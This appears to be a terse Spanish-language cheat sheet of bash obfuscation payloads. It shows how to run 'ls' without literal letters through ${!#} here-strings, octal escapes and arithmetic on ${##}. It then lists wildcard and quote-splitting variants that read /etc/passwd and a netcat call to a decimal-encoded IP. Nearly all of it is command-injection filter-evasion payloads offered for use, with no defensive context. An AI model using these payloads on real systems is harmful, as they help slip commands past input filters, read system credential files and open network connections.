/bin/bash -> bash
${!#}<<<
{
$\'
-> l
\\${##}
$((
$((
${##}<<${##}<<${##}
))
#${##}${##}
))
$((
${##}<<${##}<<${##}
))
-> s
\\${##}
$((
$((
${##}<<${##}
))
#${##}${##}$#
))
$((
$((
${##}<<${##}
))
#${##}${##}
))
\'
-> ejecuta comando
,
}
Formas de ejecutar (ls) Octal:
1 - /bin/bash -c ls
2 - ${!#}<<<{$\'ls\',}
3 - $'\154\163' -> Octal
4 - ${!#}<<<$\'\\154\\163\'
5 - ${!#}<<<{$\'\\154\\163\',}
6 - ${!#}<<<{$\'\\${##}$(($((${##}<<${##}<<${##}))#${##}${##}))$((${##}<<${##}<<${##}))\\${##}$(($((${##}<<${##}))#${##}${##}$#))$(($((${##}<<${##}))#${##}${##}))\',}
Otros
/???/??t /e**/p*s**d
/b'i'n/c'a't /e't'c/p'a's's'w'd'
/???/?at /???/????w?
/usr/b'i'n/'n'c 2130706433 80
/???/???/n? 2130706433 80